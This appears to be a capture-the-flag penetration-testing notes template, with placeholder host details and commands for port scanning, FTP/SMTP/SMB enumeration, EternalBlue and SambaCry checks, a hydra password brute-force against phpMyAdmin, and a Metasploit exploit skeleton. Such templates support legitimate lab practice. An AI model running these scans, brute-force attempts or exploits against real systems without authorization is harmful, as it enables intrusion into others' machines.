- Hostname:
- Description:
- IP Address:
- MAC Address: (ref:)
- Domain: WORKGROUP
- TCP Ports and Services
- 22
- OpenSSH
- 80
- HTTP
- 445
- SMBv1
- 22
- UDP Ports and Services
- 53
- DNS
- 53
- OS
- Distro: (ref:)
- Kernel: (ref:)
- Architecture: (ref:)
- Users (ref:)
- root
- administrator
- Vulnerabilities and Exploits
- CVE-2021-1234 (ref:)
- EDB-ID-56789
- cyberphor POC
- Metasploit
- CVE-2021-1234 (ref:)
- Tools Used
- Nmap
- Flag
- ???
- Hints
- n/a
TARGET=10.11.12.13
NAME=demo
new-ctf $NAME
cd $NAMEsudo nmap $TARGET -sS -sU --min-rate 1000 -oN scans/$NAME-nmap-initial
sudo nmap $TARGET -sS -sU -p- --min-rate 1000 -oN scans/$NAME-nmap-complete
sudo nmap $TARGET -sV $(print-open-ports-from-nmap-scan scans/$NAME-nmap-complete) -oN scans/$NAME-nmap-versions
# output
NSTRcd loot
touch README.too # create a file
ftp $TARGET 21 # login using anonymous:anonymous
put README.too # upload file created above (i.e. check if we have write privileges)
ls
binary
get file.txt # download a file (i.e. check if we have read privileges)
mget * # download everything
exit???Automated enumeration of supported SMTP commands.
sudo nmap $TARGET -p25 --script smtp-commands -oN scans/$NAME-nmap-script-smtp-commandsAutomated enumeration of existing SMTP users.
sudo nmap $TARGET -p25 --script smtp-enum-users --script-args smtp-enum-users.methods={VRFY,EXPN,RCPT} -oN scans/$NAME-nmap-script-smtp-enum-userssmtp-user-enum -M VRFY -U /usr/share/wordlists/metasploit/unix_users.txt -t $TARGETAutomated enumeration of exploitable SMTP vulnerabilities.
sudo nmap $TARGET -p25 --script smtp-vuln* -oN scans/mailman-nmap-script-smtp-vuln???dirsearch -u $TARGET:$PORT -o $FULLPATH/$NAME-dirsearch --format=simple
dirsearch -u $TARGET:$PORT -e php -o $FULLPATH/$NAME-dirsearch-php --format=simple
# output
NSTRdirb http://$TARGET -r -z10 -o scans/$NAME-dirb-common
# output
NSTRnikto -h $TARGET -p $PORT -T 2 -Format txt -o scans/$NAME-nikto-misconfig
# output
NSTRsudo nmap $TARGET -p80 --script http-shellshock -oN scans/$NAME-nmap-script-http-shellshock
# output
NSTRrpcclient -U '' $TARGET
# output
NSTRnbtscan $TARGET
# output
NSTRsmbclient -L $TARGET
# output
NSTRsmbmap -H $TARGET
# output
NSTR# check if vulnerable to EternalBlue
sudo nmap $TARGET -p445 --script smb-vuln-ms17-010 -oN scans/$NAME-nmap-scripts-smb-vuln-ms17-010
# output
NSTR# check if vulnerable to SambaCry
sudo nmap $TARGET -p445 --script smb-vuln-cve-2017-7494 --script-args smb-vuln-cve-2017-7494.check-version -oN scans/$NAME-nmap-smb-vuln-cve-2017-7494
# output
NSTRmysql -u $USER -h $TARGET
# output
NSTRsudo nmap $TARGET -p3389 --script rdp-ntlm-info -oN scans/$NAME-nmap-script-rdp-ntlm-info
# output
NSTRrdesktop -u administrator $TARGETsudo nmap $TARGET -O -oN scans/$NAME-nmap-os
# output
NSTRsudo nmap $TARGET -p445 --script smb-os-discovery -oN scans/$NAME-nmap-os-smb
# output
NSTR# CMS Web App 9000
# admin:adminhydra -l root -P /usr/share/wordlists/rockyou.txt $TARGET http-post-form "/phpmyadmin/index.php?:pma_username=^USER^&pma_password=^PASS^:Cannot|without"
# output
NSTRsearchsploit foo
mkdir edb-id-56789
cd edb-id-56789
searchsploit -x 56789git clone https://github.com/cyberphor/cve-2021-1234-poc.git
cd cve-2021-56789-pocmsfconsole
search ???
use exploit/???/???
set LHOST tun0
set RHOST $TARGET
runNSTR
NSTR
- Birds are not real.